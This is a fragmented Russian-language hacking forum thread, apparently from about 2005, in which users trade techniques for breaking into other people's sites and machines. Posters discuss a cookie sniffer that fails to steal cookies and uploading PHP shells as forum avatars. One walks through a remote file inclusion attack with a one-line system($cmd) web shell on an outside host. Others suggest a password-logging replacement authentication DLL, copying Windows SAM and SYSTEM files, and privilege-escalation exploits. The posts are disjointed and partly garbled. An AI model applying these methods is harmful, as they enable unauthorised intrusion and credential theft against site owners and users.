Dimitri
Что-то твой сниффер не хочет куки тырить.
Вот что получил: [12.7.2005 19:43:40] IP=*.*.*.* REFERER=http://www.site.com/newreply.php QUERY=

Dimitri

Надо полагать, это просто невнимательность, замаскированная под защиту от дурака

Dimitri
Это для IPB v1.x.x Для IPB v2.x.x - не прокатит: там дважды шифруется по md5.
У меня как раз аналогичная ситуация: доступ по паролю, да ещё непонятно как зашифровано: явно не md5

Это всё понятно: когда-то именно так и делал. Но вопрос несколько другой: вот я могу вместо аватара вставить скрипт. Можно ли этим воспользоваться и вставить шелл-скрипт? По идее он должен выполняться, но у меня не выполнялся... Грузился, но результата работы я не увидел...

rav3n
Это и ежу понятно. На серваке включён Safe Mod, который режет кучу функций. Вот я и спрашивал какими заменами функций можно воспользоваться.

Ко всему прочему меня не пускают выше директории форума...

Большое спасибо. Так вроде бы понятно, завтра на практике испытаю.

А можно как-нибудь шелл поиметь? Пытался загрузить скрипт с содержимым:

Скрипт грузится (вижу, что место под кактинку появилось), однако результата работы его не видно ни вверху ни внизу страницы

На одном форуме можно указывать в качестве аватара удалённый http-ресурс. При указании этот файл НЕ сохраняется на серваке, а просто указывается его адрес. То есть грузится удалённо. Напрашивается мысль о возможной XSS-атаке. Но я в php не силён. Кто подскажет php-код для этого дела?

Есть некий сайт. На его самописном форуме ссылки на темы имеют вид типа: topic_id=num.
Проверил на наличие num.php - существует. При чём тот самый.
Далее в браузере ввожу: http://имя_сайта/forum/topic_id=http://www.securitylab.ru Загрузилась главная страница секлаба.
Далее: на сайт site.com забрасываю shell.php с таким содержимым: nbsp; nbsp; nbsp;lt;? system($cmd); ? gt;
Пишу:  http://имя_сайта/forum/topic_id=http://site.com/shell.php cm d=ls
получаю в ответ: Warning: system() has been disabled for security reasons in http://site.com/shell.php on line 2

Тогда в файле shell.php заменил cmd на passthru. В ответ:
Warning: passthru() has been disabled for security reasons in http://site.com/shell.php on line 1

Попытался подрубить phpshell - уже кем-то написанный. Выдаёт:
Warning: exec() has been disabled for security reasons in http://site.com/phpsh.php on line 82


Как быть?

Stan
Наверняка на твоём форуме можно аватары заливать. Раз так  - шелл можно залить в папку images/avatars/users

PoizOn
Что-то я журнала на сайте не вижу...

А другие команды пробовал? Может fetch, get, curl, links, lynx помогут?
Хотя прежде надо посмотреть: может, прав не хватает (веб-серверу запрещено создавать файлы)?
А копировать - команда  cp

Nimda
Клавиатурный шпион? Нет, т.к. он загрузится ПОСЛЕ аутентификации юзера. Есть замена стандартной dll отвечающей за аутентификацию: она делает всё что и стандартная + сохраняет набранное в файл. Тока детектится всеми антивирями давно

Но если нужно тока пасс поменять - ERD Commander тебе в помощь

mzzz
А почему не должно получиться?
А даст это нам возможность скопировать sam и system файлы.

Jul_i
Боюсь, она этого незнает... Придётся ей объяснять как посмотреть ФС

mzzz
А это смотря как права распределены. И потом: если я не ошибаюсь, можно в реестре временно создать юзера через live-cd и дать ему права к диску

Только что-то он ругается... наверное, исходники править надо...

А как расшифровывать? Какая-нибудь прога для этого есть?

Ещё если есть физический доступ к помпу можно создать повый пасс для любой учётной записи

Неужели никто не знает?

Как этот форум шифрует пароли? Это явно не md5
Кто знает?

Nimda
Я так понимаю, разговор идёт про WinNT? Юзай локальные или удалённые сплоиты для повышения привилегий. Благо их целая куча

Zyxel Omni - это win-модем?